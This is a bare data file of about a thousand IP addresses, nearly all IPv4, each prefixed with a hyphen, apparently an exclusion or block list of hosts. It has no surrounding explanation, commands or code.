-23.224.244.51 -104.250.135.25 -106.14.241.78 -70.32.86.107 -211.157.24.154 -185.174.28.159 -45.61.114.52 -115.115.160.226 -111.73.45.170 -45.32.57.228 -74.208.149.190 -23.225.89.55 -45.61.114.50 -121.14.199.228 -69.87.198.125 -31.130.203.26 -45.35.125.45 -45.77.32.55 -83.85.114.178 -121.43.106.66 -162.144.156.156 -46.105.158.52 -92.63.109.115 -120.24.220.133 -123.139.29.205 -120.78.191.149 -47.100.30.195 -103.97.125.136 -195.88.209.173 -23.104.135.159 -50.62.59.55 -101.200.205.211 -149.202.217.134 -89.33.8.163 -142.91.95.229 -178.216.26.233 -104.238.67.199 -164.132.182.106 -54.242.127.27 -149.6.16.248 -91.121.254.201 -120.27.104.33 -101.201.221.236 -116.255.254.45 -52.66.118.106 -41.185.21.147 -47.75.56.133 -185.28.62.107 -104.207.50.102 -186.47.226.18 -54.37.216.238 -50.22.198.216 -111.230.141.112 -120.25.159.89 -85.214.138.163 -112.74.42.241 -117.121.7.121 -47.93.118.222 -123.56.95.134 -82.135.148.121 -111.231.109.25 -95.211.193.20 -212.154.200.210 -103.48.7.17 -198.176.54.5 -54.254.227.241 -117.41.235.62 -119.29.190.112 -144.202.98.44 -65.60.28.171 -64.62.145.34 -50.28.37.9 -104.199.153.100 -64.150.180.182 -50.62.59.115 -182.162.143.139 -222.214.175.224 -192.80.147.53 -52.8.59.62 -209.123.65.99 -142.4.107.89 -52.68.249.34 -23.225.239.204 -192.80.147.90 -168.235.85.188 -93.115.7.94 -139.162.104.186 -121.41.94.209 -119.23.71.41 -171.13.85.253 -54.92.90.121 -222.73.44.221 -178.162.193.41 -185.158.153.100 -176.126.244.217 -198.58.96.71 -120.132.117.165 -200.85.243.2 -158.69.143.164 -95.138.187.230 -45.114.94.223 -129.158.67.212 -45.119.118.135 -121.42.159.165 -167.114.158.4 -83.166.240.219 -123.207.92.123 -217.23.11.123 -115.159.145.123 -121.52.154.228 -76.74.154.53 -114.215.142.196 -213.14.115.149 -52.28.98.249 -222.186.170.92 -192.80.147.3 -23.225.239.4 -82.135.151.206 -120.27.43.206 -115.29.226.109 -144.168.72.137 -61.152.244.8 -114.55.62.74 -109.201.146.99 -23.244.190.159 -39.108.152.196 -47.88.34.211 -23.244.241.136 -142.91.95.10 -112.74.54.163 -72.249.76.63 -104.203.82.98 -13.92.248.140 -115.182.13.148 -37.59.81.68 -192.80.147.221 -172.246.101.46 -180.235.70.46 -23.224.244.60 -167.160.189.203 -47.89.38.181 -67.225.172.101 -181.112.145.252 -166.63.21.47 -23.224.244.42 -115.28.137.170 -112.74.89.25 -192.169.196.238 -104.203.82.96 -115.231.81.75 -122.155.17.99 -104.207.131.225 -178.32.50.108 -58.119.86.218 -41.77.119.37 -114.55.140.245 -62.109.23.106 -162.247.78.78 -95.163.78.240 -91.134.125.130 -203.158.215.16 -188.215.244.184 -188.241.127.53 -52.80.83.78 -202.174.123.20 -45.76.186.86 -68.66.233.153 -59.151.29.122 -153.120.50.222 -5.189.162.199 -198.200.41.86 -111.231.134.14 -23.234.26.166 -142.4.119.68 -72.167.178.223 -158.58.172.127 -5.189.139.25 -47.90.43.224 -89.111.180.2 -72.32.187.135 -149.56.41.162 -23.225.89.115 -54.199.208.14 -54.225.79.49 -116.62.68.107 -104.165.60.83 -47.92.85.241 -173.212.238.37 -86.104.177.11 -61.58.60.245 -216.52.187.175 -74.208.222.161 -182.92.226.211 -45.63.127.251 -111.204.244.69 -209.59.174.46 -110.74.169.83 -142.4.107.92 -37.59.203.214 -209.95.39.208 -199.180.155.129 -54.70.219.244 -125.253.127.143 -121.41.47.85 -92.63.139.251 -150.107.30.30 -120.26.126.94 -112.74.130.74 -144.168.70.139 -45.61.115.39 -101.200.162.12 -122.114.158.127 -202.66.30.59 -134.119.219.187 -182.92.107.232 -45.126.210.154 -23.224.115.27 -121.40.211.105 -54.199.156.64 -45.33.64.213 -123.207.242.146 -153.120.8.68 -69.87.199.8 -92.255.60.119 -178.238.230.74 -77.81.120.178 -125.253.127.155 -120.26.44.42 -220.172.13.234 -188.116.35.120 -87.106.93.196 -45.32.48.141 -111.75.230.97 -91.224.140.164 -109.169.76.35 -52.24.208.19 -115.28.193.29 -120.25.122.6 -46.245.160.60 -121.199.47.129 -184.72.117.205 -118.190.103.47 -210.210.143.9 -89.185.228.234 -46.166.130.195 -120.92.214.27 -69.13.210.176 -45.117.160.7 -45.114.94.144 -118.186.246.250 -118.190.71.195 -122.155.184.26 -23.224.115.132 -104.207.40.137 -173.243.38.110 -209.237.252.9 -116.62.235.228 -121.199.32.1 -91.210.189.208 -155.94.195.154 -198.44.250.239 -209.239.123.233 -104.207.156.173 -103.35.73.44 -41.217.232.196 -54.38.59.101 -65.60.59.118 -103.204.223.247 -23.225.196.238 -60.188.234.232 -65.60.22.22 -34.200.71.220 -107.180.79.71 -158.69.78.79 -162.247.78.219 -213.189.56.74 -103.57.190.73 -23.224.245.36 -49.248.96.213 -133.242.201.32 -47.89.43.149 -85.214.196.114 -118.178.192.73 -45.79.196.80 -92.249.68.70 -94.45.165.5 -66.70.223.69 -158.69.100.53 -193.151.90.243 -115.239.209.80 -87.106.16.14 -176.31.16.61 -114.119.11.190 -220.226.20.15 -45.76.128.72 -144.168.72.130 -192.99.78.15 -66.254.175.39 -175.10.195.61 -103.27.120.9 -119.29.236.62 -106.75.147.121 -84.39.34.139 -64.120.123.236 -218.58.210.227 -104.198.76.173 -172.104.43.133 -178.33.15.90 -78.140.179.101 -185.182.96.71 -162.144.59.149 -112.74.103.108 -104.203.82.55 -207.148.79.122 -119.28.18.254 -174.139.182.116 -46.226.108.229 -194.247.13.159 -103.20.193.53 -119.81.219.205 -47.88.153.30 -37.220.20.252 -120.25.107.141 -173.214.179.166 -212.24.108.135 -212.48.87.244 -218.251.227.17 -67.227.147.192 -23.224.242.24 -39.108.136.167 -64.31.31.151 -69.175.18.39 -185.101.156.109 -67.23.255.210 -106.184.1.149 -119.29.41.83 -149.91.91.207 -61.91.3.42 -158.69.68.243 -103.84.108.214 -158.69.193.22 -178.238.225.13 -104.200.30.136 -217.20.131.161 -104.203.82.18 -34.200.86.168 -185.20.226.32 -198.200.41.48 -172.247.51.80 -65.60.43.183 -23.104.135.155 -212.68.46.4 -118.193.201.88 -27.111.36.153 -77.241.16.2 -121.40.220.147 -195.72.240.168 -23.225.113.245 -23.225.89.178 -120.25.103.20 -5.178.86.20 -123.57.33.168 -121.42.40.103 -74.122.132.167 -120.26.88.7 -210.245.80.81 -151.80.161.98 -120.25.123.110 -78.137.160.25 -192.80.147.110 -202.52.129.90 -107.180.78.224 -114.55.151.196 -213.149.159.172 -104.199.151.9 -180.222.184.18 -211.159.218.149 -23.88.82.153 -121.196.224.189 -178.63.19.70 -95.213.177.179 -185.197.62.147 -51.254.97.119 -162.247.234.86 -94.70.214.180 -86.104.177.73 -203.151.27.181 -35.173.148.107 -66.175.221.179 -114.215.184.232 -101.37.33.18 -94.23.111.123 -47.95.208.156 -37.59.108.36 -95.95.226.78 -47.93.39.80 -208.78.25.242 -110.138.65.213 -114.119.7.203 -5.153.42.11 -85.91.142.11 -118.190.23.117 -5.56.58.132 -5.196.69.126 -172.246.101.161 -182.254.234.99 -23.225.89.80 -108.161.137.219 -185.27.134.65 -172.104.121.84 -177.154.162.43 -23.244.190.57 -121.41.92.215 -115.28.77.246 -162.144.52.63 -54.255.234.73 -150.107.31.194 -103.208.35.224 -172.104.91.96 -222.186.30.63 -178.20.155.235 -162.144.102.212 -118.193.213.49 -47.93.247.33 -61.115.115.69 -125.64.92.5 -51.254.5.200 -65.18.113.53 -107.22.169.64 -23.225.239.216 -198.50.191.110 -119.23.226.78 -47.94.155.44 -45.252.248.232 -66.254.189.89 -34.196.195.77 -196.43.235.200 -39.108.215.7 -67.227.221.98 -212.1.214.41 -106.187.38.238 -101.37.169.198 -139.196.100.109 -47.94.232.95 -121.43.228.239 -23.29.125.92 -222.122.226.181 -219.117.236.148 -45.77.36.209 -47.90.125.247 -139.162.151.93 -211.241.227.72 -209.95.39.217 -120.25.237.219 -23.244.190.232 -115.146.121.214 -166.63.21.89 -116.236.192.43 -50.97.208.111 -183.62.157.110 -188.165.114.116 -121.41.129.10 -66.39.119.150 -123.57.220.38 -74.117.155.22 -182.92.218.165 -23.225.239.35 -123.207.247.71 -172.247.51.108 -192.99.24.28 -86.120.155.73 -72.1.245.48 -185.110.64.4 -46.152.47.198 -185.183.208.3 -49.254.179.196 -123.206.131.221 -144.48.124.203 -185.153.230.12 -23.225.89.244 -193.70.76.118 -103.90.228.109 -119.29.116.218 -43.230.201.52 -139.196.86.111 -176.53.37.97 -123.150.244.26 -115.28.15.204 -77.92.139.99 -45.32.19.124 -121.14.17.101 -120.198.69.20 -98.143.158.77 -23.104.135.160 -93.87.76.105 -104.239.138.223 -149.154.67.97 -96.44.141.162 -27.254.85.161 -118.145.20.31 -91.215.159.188 -216.92.98.59 -45.114.117.218 -116.211.151.46 -14.206.6.10 -94.23.93.92 -45.114.124.78 -123.57.85.221 -42.51.239.11 -88.204.109.41 -103.100.140.28 -162.244.12.226 -199.102.46.211 -195.175.227.175 -192.119.13.171 -164.115.33.106 -118.114.242.208 -195.181.246.36 -23.244.190.155 -54.89.253.63 -169.50.69.26 -123.207.246.88 -121.41.55.225 -54.158.88.219 -77.77.149.22 -112.74.207.215 -58.248.68.102 -66.128.54.28 -195.62.52.182 -43.230.203.1 -140.129.140.221 -153.122.13.18 -106.187.51.240 -121.43.36.178 -101.200.1.215 -178.22.69.176 -117.78.49.63 -120.76.41.184 -93.115.243.7 -139.196.7.132 -39.108.167.241 -185.98.63.132 -23.88.82.232 -104.239.240.226 -79.137.81.251 -198.200.41.102 -195.149.118.85 -23.225.113.162 -61.163.211.132 -122.115.49.110 -45.119.83.8 -39.108.163.113 -61.142.176.46 -47.88.24.174 -59.33.44.176 -166.63.21.90 -183.136.239.142 -71.46.208.235 -180.178.60.234 -176.31.28.45 -103.15.185.78 -116.62.21.73 -222.161.203.140 -117.27.251.86 -62.112.9.112 -101.200.59.37 -62.210.220.137 -142.4.119.80 -118.190.27.122 -198.74.50.194 -23.225.113.36 -37.143.10.217 -180.178.62.86 -222.92.117.49 -199.83.49.228 -54.249.178.209 -207.58.164.195 -64.254.32.101 -69.30.202.73 -173.212.224.120 -50.62.30.243 -82.146.33.39 -142.4.107.80 -54.204.179.39 -192.0.19.75 -120.25.157.170 -133.242.195.155 -193.33.111.119 -50.30.38.160 -59.151.104.138 -91.205.172.107 -52.68.29.236 -174.142.54.15 -78.111.82.98 -142.91.95.98 -47.89.180.94 -218.59.146.72 -45.76.144.34 -125.253.127.166 -119.29.168.15 -43.230.200.156 -192.162.84.105 -60.205.157.119 -86.104.177.97 -66.154.123.115 -200.52.78.12 -112.199.249.221 -86.104.177.24 -2001:4800:7813:516:386a:ba3c:5a93:ae1c -93.115.243.9 -210.140.118.30 -82.135.151.246 -162.247.234.82 -217.174.152.159 -43.230.200.240 -74.208.195.134 -82.102.12.66 -139.224.65.47 -77.241.16.27 -45.32.35.28 -179.127.59.98 -122.152.217.161 -142.91.95.150 -217.160.109.46 -72.47.211.167 -23.225.89.218 -219.246.191.170 -149.202.210.53 -60.173.242.212 -23.224.115.253 -51.254.156.200 -181.65.197.253 -52.28.191.185 -180.173.89.179 -31.184.195.172 -47.91.140.39 -184.164.143.227 -192.80.147.136 -195.144.232.44 -198.57.180.142 -117.30.204.69 -121.28.32.2 -120.24.19.215 -188.116.7.24 -173.236.115.78 -219.246.70.88 -139.224.16.10 -189.84.208.205 -192.151.156.238 -37.46.128.65 -193.23.138.69 -27.223.83.220 -72.52.69.145 -109.169.86.143 -218.5.243.126 -153.120.50.215 -173.212.244.19 -153.122.27.24 -222.16.43.153 -86.123.64.103 -104.250.135.5 -69.64.88.11 -120.76.76.193 -123.29.75.132 -111.231.89.204 -210.5.47.28 -178.79.181.178 -112.74.216.174 -45.77.44.172 -104.207.44.99 -97.74.233.193 -211.75.222.154 -52.74.68.226 -148.66.19.227 -125.253.127.125 -212.68.46.2 -103.200.118.188 -213.136.71.144 -64.118.87.203 -45.114.94.92 -104.223.20.202 -89.41.60.158 -37.187.249.70 -164.52.150.238 -118.190.82.56 -52.88.72.128 -103.25.20.241 -77.92.144.19 -104.207.52.91 -118.70.183.236 -23.225.239.105 -123.206.42.245 -47.52.94.147 -52.19.91.27 -23.88.82.69 -192.80.147.75 -61.67.218.212 -177.101.147.6 -199.119.142.114 -112.124.45.203 -176.223.197.57 -123.56.77.202 -88.99.119.214 -218.240.36.11 -200.199.229.77 -115.29.141.227 -178.33.109.57 -114.215.104.151 -35.187.80.213 -142.91.95.238 -167.114.112.113 -34.242.8.6 -5.135.224.51 -122.114.99.198 -120.25.63.49 -173.208.220.234 -23.224.245.28 -37.187.11.28 -5.135.178.113 -167.114.51.93 -74.208.64.179 -81.169.204.249 -112.121.100.226 -178.32.144.187 -142.4.107.198 -115.29.172.16 -119.90.126.123 -184.72.229.183 -104.238.100.136 -206.217.216.80 -45.77.20.143 -153.120.40.79 -69.197.147.194 -144.168.72.133 -150.107.31.241 -66.254.176.77 -218.244.137.174 -177.66.121.6 -107.180.84.41 -45.33.20.16 -192.80.147.170 -112.124.117.198 -184.95.61.42 -104.130.194.135 -114.215.84.30 -42.121.28.24 -95.213.223.186 -37.187.140.119 -192.80.147.172 -154.0.169.221 -119.29.180.94 -204.11.233.149 -47.96.133.84 -172.247.51.147 -209.126.122.158 -104.203.82.249 -80.241.210.122 -82.146.38.242 -171.35.182.2 -94.180.249.7 -96.126.108.58 -206.217.216.79 -54.234.222.137 -23.227.190.210 -104.238.191.49 -46.22.220.52 -125.253.127.189 -66.70.227.109 -216.240.57.250 -23.225.239.11 -23.227.133.36 -103.215.124.46 -106.75.101.191 -177.93.110.2 -124.128.39.4 -52.199.220.131 -115.28.105.69 -212.68.42.179 -211.166.12.30 -166.63.21.91 -188.165.207.194 -123.207.82.100 -192.99.4.123 -120.76.210.108 -109.75.252.105 -209.59.156.247 -103.12.68.26 -118.184.0.33 -23.244.190.59 -121.40.63.40 -95.211.153.43 -139.162.211.28 -125.253.127.106 -151.80.181.234 -45.63.11.122 -185.82.220.205 -95.213.169.146 -103.48.119.252 -106.14.136.69 -176.31.30.13 -5.135.148.52 -23.244.241.164 -193.227.5.210 -113.88.102.53 -162.144.104.37 -23.225.89.130 -222.186.59.187 -91.109.242.154 -188.165.47.9 -185.98.7.101 -203.195.175.251 -213.145.46.77 -176.31.210.41 -85.17.164.90 -222.186.170.115 -120.26.235.206 -183.131.83.44 -89.19.8.203 -52.4.246.94 -120.26.225.129 -54.226.78.122 -45.32.105.127 -118.184.0.111 -52.73.0.250 -112.80.253.87 -82.131.160.5 -103.55.25.30 -77.222.54.217 -139.162.52.69 -94.250.251.118 -13.58.44.183 -104.207.40.130 -184.154.181.219 -202.147.5.158 -139.129.166.211 -182.92.235.172 -181.118.92.235 -64.120.123.188 -142.44.214.152 -27.115.25.118 -207.38.83.13 -198.167.142.170 -23.225.239.82 -46.226.62.143 -142.91.95.204 -45.114.94.171 -121.54.174.227 -107.180.76.185 -85.17.76.166 -192.163.203.196 -175.196.22.93 -208.91.192.141 -103.45.99.168 -184.154.202.150 -31.154.39.186 -50.115.122.108 -46.242.131.60 -112.74.197.113 -171.13.47.69 -45.61.113.50 -120.26.209.202 -149.56.165.165 -188.165.197.150 -176.9.113.226 -183.181.172.23 -91.197.185.182 -103.15.51.180 -86.104.177.10 -115.28.150.153 -89.108.91.162 -76.85.223.23 -157.7.203.128 -114.119.11.180 -142.91.95.252 -72.51.36.128 -183.232.59.218 -77.77.151.90 -45.114.94.13 -67.207.141.224 -45.61.114.29 -125.253.127.150 -113.98.231.195 -115.28.186.42 -104.168.171.211 -113.66.158.106 -116.206.176.228 -176.223.1.218 -121.40.155.225 -45.76.76.209 -64.120.123.250 -172.246.101.95 -101.200.134.106 -80.237.217.35 -121.129.119.33 -115.239.229.242 -149.71.99.248 -37.59.213.89 -67.198.143.46 -192.99.61.235 -91.221.99.143 -118.97.77.156 -120.26.115.25 -89.33.8.162 -220.120.11.246 -60.250.20.30 -23.244.241.135 -58.18.5.55 -23.225.239.252 -31.186.103.34 -45.114.94.161 -103.20.248.31 -182.92.182.151 -202.89.16.152 -120.132.12.159 -104.203.82.250 -45.76.154.31 -35.194.185.139 -164.52.150.229 -67.221.179.58 -117.78.35.228 -59.153.61.170 -185.174.31.206 -164.132.134.1 -84.204.252.26 -31.134.69.190 -185.174.28.152 -52.26.52.54 -185.38.45.124 -188.116.7.104 -117.156.24.231 -182.137.15.245 -115.159.209.232 -169.57.62.133 -185.174.30.144 -142.91.95.73 -23.244.241.27 -43.249.9.44 -106.185.41.62 -153.122.16.60 -45.122.221.153 -121.199.23.211 -213.145.103.22 -133.242.180.63 -106.186.28.114 -123.126.110.42 -107.180.78.158 -210.59.230.148 -104.239.206.46 -111.230.254.232 -115.29.40.224 -185.26.122.41 -34.197.176.150 -35.231.86.75 -146.148.64.228 -178.211.32.98 -104.207.50.82 -198.16.64.74 -161.58.185.206 -69.30.202.71 -188.165.137.134 -80.91.185.196 -109.201.149.181 -158.69.36.21 -63.251.233.86 -101.201.64.173 -39.108.73.60 -103.255.147.163 -104.250.150.117 -216.127.151.251 -185.174.29.168 -103.98.112.254 -45.61.112.38 -23.225.113.78 -213.251.187.75 -23.225.113.196 -125.253.127.174 -93.189.36.139 -54.87.173.72 -199.204.44.10 -188.165.58.132 -185.87.121.80 -121.40.179.194 -198.24.161.107 -194.54.83.196 -106.75.78.43 -176.111.61.249 -120.55.92.170 -18.195.243.210 -34.232.150.117 -104.238.79.57 -202.147.142.198 -77.120.126.247 -45.32.144.210 -67.215.236.181 -185.174.31.208 -175.197.202.35 -170.239.84.11 -173.82.138.197 -123.57.185.49 -198.61.169.197 -54.174.225.155 -35.154.113.227 -202.46.1.197 -210.245.90.141 -119.28.12.250 -158.69.36.23 -132.148.139.229 -23.234.5.42 -23.88.82.111 -122.152.211.242 -91.221.99.139 -46.146.220.216 -39.110.232.163 -198.23.236.129 -99.192.137.107 -111.230.133.48 -96.44.172.85 -185.85.239.209 -198.50.176.69 -103.250.21.98 -185.174.29.195 -45.76.168.65 -45.40.139.83 -47.93.12.115 -121.40.39.203 -112.197.2.140 -185.23.24.144 -115.28.151.170 -172.247.51.57 -72.1.245.33 -160.16.54.160 -37.48.81.50 -128.14.85.155 -106.14.9.11 -42.112.28.9 -202.146.219.171 -183.61.108.18 -173.243.113.154 -112.74.130.125 -119.29.91.116 -67.225.172.103 -115.202.148.168 -54.233.99.117 -112.74.115.8 -104.207.44.93 -134.119.167.149 -202.111.173.26 -172.246.101.243 -188.116.2.122 -88.85.81.72 -192.169.158.166 -45.33.45.102 -50.116.116.20 -209.142.66.240 -142.91.95.134 -119.254.210.192 -13.228.84.67 -115.29.169.116 -123.57.173.199 -142.4.107.102 -204.11.236.221 -54.173.178.252 -123.207.234.53 -89.234.182.235 -45.114.94.46 -114.55.57.143 -66.154.119.249 -195.208.127.190 -23.244.190.178 -222.42.151.52 -114.215.28.120 -23.224.243.42 -190.128.218.190 -195.228.155.160 -148.251.20.126 -120.79.70.221 -121.40.104.11 -185.81.166.22 -186.227.194.254 -116.62.204.33 -209.205.202.212 -104.203.82.193 -94.23.134.240 -103.255.44.42 -104.224.205.100 -144.217.245.58 -95.213.179.122 -123.180.140.137 -82.146.43.57 -52.220.161.2 -163.172.196.102 -23.244.190.85 -178.32.123.106 -125.253.127.201 -27.50.26.237 -192.95.18.148 -180.76.189.115 -218.75.26.152 -123.56.88.131 -178.33.15.77 -46.235.226.141 -158.69.254.39 -23.225.239.206 -23.244.241.15 -162.247.233.38 -123.207.248.94 -115.28.147.134 -139.199.118.172 -180.179.123.89 -89.187.88.58 -64.118.92.61 -115.68.230.93 -67.20.61.163 -104.239.136.95 -139.162.184.11 -54.178.134.105 -45.251.88.35 -121.43.151.11 -50.63.12.197 -142.4.107.115 -116.255.138.4 -125.65.45.137 -79.137.20.65 -45.61.112.31 -172.104.66.44 -195.64.155.209 -104.207.50.112 -46.166.165.8 -166.62.39.49 -183.27.134.204 -188.165.128.67 -139.196.52.74 -54.164.23.253 -104.203.82.252 -77.81.120.250 -111.230.14.182 -67.222.13.190 -94.247.24.15 -43.226.64.50 -54.233.184.52 -45.61.114.15 -190.108.84.190 -23.89.140.172 -219.246.16.48 -112.126.69.243 -54.86.148.217 -103.28.38.120 -72.1.245.9 -185.174.29.171 -78.93.196.156 -94.23.87.220 -104.203.82.212 -45.32.50.8 -198.143.146.141 -45.61.112.43 -172.247.51.116 -93.115.28.182 -153.36.240.248 -153.122.36.46 -52.66.148.128 -195.60.248.43 -112.74.64.251 -37.77.130.28 -113.108.68.162 -114.215.173.51 -162.247.78.218 -208.85.7.93 -78.93.183.165 -66.70.170.124 -103.224.82.42 -66.85.175.11 -187.72.231.93 -122.152.193.239 -146.255.43.158 -120.92.36.249 -80.241.214.130 -83.137.55.27 -120.24.212.236 -66.254.163.5 -192.154.97.4 -173.249.4.195 -103.18.5.28 -37.97.247.227 -67.225.249.252 -65.18.113.64 -103.50.76.146 -66.154.123.118 -103.200.5.152 -61.164.153.209 -123.149.113.31 -27.254.47.151 -116.255.145.132 -54.89.168.140 -150.183.249.89 -92.240.245.8 -163.44.153.188 -23.225.239.44 -217.23.159.150 -43.242.181.140 -121.35.97.42 -83.136.232.3 -192.169.140.125 -174.142.54.9 -160.19.51.187 -46.224.2.171 -172.246.101.251 -23.88.82.24 -120.24.250.163 -183.13.171.21 -153.125.234.55 -119.254.145.132 -212.118.113.61 -51.254.206.87 -119.10.54.234 -13.230.99.221 -62.92.124.157 -107.180.85.165 -185.174.28.117 -119.252.89.25 -45.114.94.78 -176.28.22.51 -23.234.5.238 -103.37.157.206 -172.110.29.81 -118.190.13.155 -46.44.234.3 -138.201.226.253 -97.74.230.160 -119.23.215.253 -45.61.113.13 -113.97.196.212 -52.0.195.180 -106.15.203.88 -59.108.66.236 -64.118.92.11 -106.14.93.198 -202.120.233.42 -139.196.227.222 -104.154.34.25 -120.25.156.154 -178.32.163.113 -35.197.172.231 -99.192.229.87 -139.199.231.36 -49.212.216.142 -157.185.166.184 -23.225.113.205 -104.207.50.114 -172.247.51.168 -144.48.241.77 -97.74.134.173 -82.135.21.15 -115.29.146.198 -203.81.246.9 -112.74.126.251 -23.224.243.19 -133.242.70.172 -103.246.18.126 -45.32.151.172 -183.64.251.50 -212.112.216.25 -88.99.142.6 -188.165.189.241 -139.196.105.74 -132.148.13.134 -88.126.138.30 -23.234.23.107 -139.129.13.38 -198.50.162.201 -104.203.82.184 -103.100.157.191 -104.250.135.13 -54.174.248.191 -18.231.8.115 -78.137.113.153 -46.166.165.71 -162.247.234.83 -166.78.23.235 -122.226.65.250 -54.196.4.26 -41.77.119.36 -188.165.32.54 -200.60.171.170 -121.42.198.9 -132.148.27.183 -54.172.109.29 -198.143.130.117 -34.217.193.60 -123.57.248.153 -198.1.74.9 -119.28.72.249 -45.79.138.237 -23.224.115.78 -185.66.140.35 -199.182.168.134 -72.18.158.11 -182.254.158.144 -18.217.105.163 -115.159.62.30 -92.243.28.94 -92.243.28.94 -104.207.40.133 -54.173.210.124 -123.176.31.60 -67.55.106.182 -61.184.37.142 -5.196.226.174 -185.174.28.116 -95.213.246.214 -123.57.1.195 -39.108.192.159 -72.52.132.45 -172.247.51.55 -103.100.157.236 -76.164.207.120 -188.130.47.252 -52.56.93.35 -31.193.6.26 -125.253.127.247 -122.114.70.97 -147.75.197.23 -111.198.46.151 -125.253.127.107 -115.29.175.216 -37.143.8.143 -125.206.114.89 -192.225.226.161 -23.225.239.144 -188.125.162.212 -27.120.84.95 -120.26.232.189 -190.144.130.126 -104.165.41.144 -47.93.18.143 -190.12.81.165 -123.57.146.116 -153.126.153.35 -95.172.16.83 -165.246.41.185 -91.202.36.250 -31.131.251.174 -58.18.80.68 -107.190.235.76 -122.154.22.189 -195.178.26.62 -50.115.116.231 -181.48.145.156 -173.214.176.33 -45.76.198.68 -86.104.210.201 -114.215.96.146 -198.101.163.128 -45.114.94.67 -192.165.186.213 -192.138.22.26 -109.201.146.111 -112.124.9.11 -23.244.241.234 -183.237.176.9 -177.52.160.35 -104.224.203.156 -23.224.115.94 -123.206.17.185 -108.167.186.60 -123.190.210.18 -78.108.91.146 -172.247.51.229 -104.237.142.108 -62.76.24.69 -213.240.249.34 -95.211.220.65 -124.158.5.110 -185.37.228.136 -45.79.9.92 -172.246.101.88 -161.202.7.153 -164.132.90.200 -94.23.24.209 -199.87.234.126 -58.68.232.239 -139.129.25.68 -182.59.4.26 -67.227.142.22 -173.236.115.70 -104.203.82.214 -125.212.221.29 -13.230.180.95 -123.207.39.240 -184.107.243.62 -178.33.252.254 -86.110.225.58 -121.13.248.189 -82.102.14.25 -45.32.109.13 -87.120.42.33 -184.171.249.50 -142.44.139.34 -167.114.178.211 -54.183.113.219 -45.32.123.136 -222.187.222.230 -39.109.18.123 -160.124.140.182 -115.146.121.217 -47.104.160.124 -101.200.127.236 -119.29.103.177 -166.62.62.16 -112.90.220.247 -74.86.236.82 -74.200.203.252 -189.80.247.203 -89.232.78.19 -162.144.36.154 -50.31.0.7 -103.229.183.183 -52.192.123.83 -108.61.217.80 -200.233.202.203 -88.99.109.84 -103.100.157.157 -198.27.69.209 -23.225.113.153 -142.91.95.120 -83.149.75.38 -46.105.100.25 -115.159.37.229 -185.174.28.148 -4.35.164.135 -94.250.248.48 -154.73.162.87 -23.225.239.83 -52.206.145.26 -104.156.226.129 -192.99.94.197 -120.27.209.101 -23.224.115.178 -192.155.224.188 -112.124.112.114 -65.60.5.120 -203.91.35.33 -144.168.70.132 -78.109.29.71 -23.224.242.59 -23.225.113.91 -37.59.41.90 -176.31.12.234 -60.249.59.118 -121.127.232.29 -182.19.50.14 -59.63.166.114 -52.9.140.107 -115.29.160.170 -101.251.111.3 -107.165.11.120 -112.78.10.73 -120.77.42.227 -121.50.170.57 -23.225.113.216 -218.60.25.235 -180.97.81.219 -23.225.89.59 -208.118.240.152 -51.254.217.55 -23.92.54.215 -31.192.228.158 -45.114.245.82 -185.142.134.16 -218.244.138.76 -81.2.251.50 -66.70.215.76 -2.88.134.157 -118.190.134.2 -112.124.120.97 -54.194.56.93 -107.155.125.51 -173.82.245.45 -38.128.74.75 -46.38.55.117 -203.160.94.171 -78.40.225.121 -173.236.115.142 -185.185.233.131 -213.128.77.68 -103.100.157.197 -182.254.139.174 -106.185.55.198 -123.57.9.180 -81.169.184.135 -153.126.150.30 -45.118.254.43 -58.221.199.242 -164.132.225.61 -133.242.121.221 -91.121.254.192 -125.0.127.247 -92.222.99.34 -104.203.82.15 -210.211.97.107 -94.23.21.222 -94.23.21.222 -120.76.208.113 -117.54.124.44 -58.56.76.173 -96.44.153.11 -120.55.82.172 -183.82.125.189 -110.170.117.44 -103.74.121.59 -23.244.241.114 -195.2.252.121 -212.1.213.59 -58.240.191.34 -123.56.109.121 -23.224.115.219 -34.208.43.197 -202.10.78.195 -77.87.208.7 -112.124.33.9 -196.41.56.45 -183.129.252.78 -210.86.147.188 -61.250.91.181 -222.62.239.2 -45.63.88.134 -64.78.163.228 -101.132.106.236 -113.61.110.205 -103.100.157.185 -202.4.126.118 -149.202.188.128 -60.12.124.114 -120.133.1.121 -88.85.84.113 -185.27.134.120 -125.253.127.160 -112.25.137.48 -45.114.94.84 -23.253.252.177 -193.34.182.28 -176.31.107.44 -104.207.40.171 -173.82.151.32 -118.89.30.56 -138.201.187.84 -162.144.89.175 -103.100.157.101 -23.224.115.166 -125.253.127.145 -47.92.142.20 -123.207.67.140 -59.86.166.20 -51.254.96.11 -198.16.54.227 -168.235.96.204 -54.64.46.104 -121.41.41.93 -200.80.44.98 -75.126.64.207 -123.207.40.213 -198.154.237.170 -23.224.115.3 -163.177.178.200 -23.244.241.4 -89.35.218.3 -86.104.177.96 -186.1.41.108 -222.222.30.219 -182.18.25.118 -103.45.100.84 -112.124.9.79 -116.196.93.153 -139.162.223.246 -120.27.126.81 -198.58.42.2 -112.126.87.230 -39.108.81.11 -172.247.51.191 -45.114.94.234 -52.91.191.136 -194.219.117.49 -123.57.140.84 -47.91.16.180 -139.129.219.160 -176.28.18.151 -198.91.86.58 -108.179.237.146 -138.122.108.59 -62.213.67.146 -193.70.95.0 -50.97.234.155 -45.77.170.165 -74.208.153.6 -23.225.89.214 -123.59.65.113 -104.243.46.213 -34.238.116.178 -47.100.199.35 -5.39.121.108 -119.29.221.114 -23.225.239.127 -52.166.232.49 -200.13.136.80 -144.168.71.142 -114.215.201.153 -64.131.73.211 -120.209.132.98 -216.117.130.54 -23.225.239.243 -23.247.25.41 -104.203.82.196 -64.131.72.78 -188.165.115.79 -209.236.120.215 -203.81.246.10 -103.30.245.46 -114.55.112.219 -119.254.12.234 -195.162.90.144 -54.144.238.170 -192.163.253.221 -142.4.119.96 -47.96.27.227 -23.225.113.163 -103.100.157.206 -50.28.19.1 -185.174.28.133 -183.111.138.167 -205.210.189.36 -95.140.44.119 -139.224.129.246 -112.74.210.205 -185.16.229.195 -212.1.213.138 -119.148.1.54 -66.63.171.149 -96.126.112.54 -209.15.212.183 -23.225.113.251 -195.20.15.168 -209.95.33.14 -121.199.46.201 -38.126.22.90 -210.128.159.85 -213.136.64.18 -92.247.33.69 -61.152.188.190 -89.107.153.24 -23.88.141.29 -185.174.29.205 -59.110.54.221 -222.73.49.160 -166.63.21.92 -185.58.205.152 -125.253.127.112 -188.132.204.118 -121.196.211.45 -91.230.194.86 -103.100.157.120 -84.16.68.142 -121.41.226.226 -103.100.157.143 -103.45.11.83 -64.120.123.176 